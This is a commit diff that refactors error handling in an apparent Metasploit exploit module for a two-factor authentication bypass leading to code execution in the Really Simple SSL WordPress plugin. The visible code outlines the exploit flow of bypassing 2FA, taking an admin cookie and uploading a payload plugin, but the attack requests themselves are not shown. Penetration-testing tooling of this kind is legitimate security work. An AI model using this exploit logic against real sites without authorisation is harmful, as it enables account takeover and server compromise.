Remove complexity

rapid7 · Dec 6, 2024 · 8f274f0 · 8f274f0
1 parent 9de6a89
commit 8f274f0
Showing 1 changed file with 8 additions and 15 deletions.
diff --git a/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb b/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb
@@ -13,9 +13,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
 
-  class WordPressNotOnline < StandardError; end
-  class AdminCookieError < StandardError; end
-
   def initialize(info = {})
     super(
       update_info(
@@ -73,7 +70,7 @@ def initialize(info = {})
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
-      )
+    )
 
     register_options(
       [
@@ -97,19 +94,15 @@ def check
       end
     end
 
-    return CheckCode::Unknown('No vulnerable plugins were detected.')
+    CheckCode::Unknown('No vulnerable plugins were detected.')
   end
 
   def exploit
     admin_cookie = bypass_2fa
-    raise AdminCookieError, 'Failed to retrieve admin cookie' unless admin_cookie
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve admin cookie') unless admin_cookie
 
     print_status('2FA bypass successful. Uploading plugin...')
     upload_and_execute_payload(admin_cookie)
-  rescue WordPressNotOnline => e
-    fail_with(Failure::Unreachable, "Target WordPress site is unreachable: #{e.message}")
-  rescue AdminCookieError => e
-    fail_with(Failure::UnexpectedReply, "Failed to bypass 2FA: #{e.message}")
   rescue StandardError => e
     fail_with(Failure::Unknown, "An unexpected error occurred: #{e.message}")
   end
@@ -132,18 +125,18 @@ def bypass_2fa
       }
     })
 
-    raise WordPressNotOnline, 'No response from the target' unless res
+    fail_with(Failure::Unreachable, 'No response from the target') unless res
 
     case res.code
     when 404
-      fail_with(Failure::NotVulnerable, 'Two-Factor Authentication (2FA) is not enabled or the plugin is misconfigured.')
+      fail_with(Failure::NotVulnerable, '2FA is not enabled or the plugin is misconfigured.')
     when 200
-      return extract_cookies(res.get_cookies) if res.get_cookies
+      cookies = extract_cookies(res.get_cookies)
+      fail_with(Failure::UnexpectedReply, 'Failed to retrieve admin cookies.') unless cookies
+      return cookies
     else
       fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}.")
     end
-
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve admin cookies.')
   end
 
   def extract_cookies(cookie_header)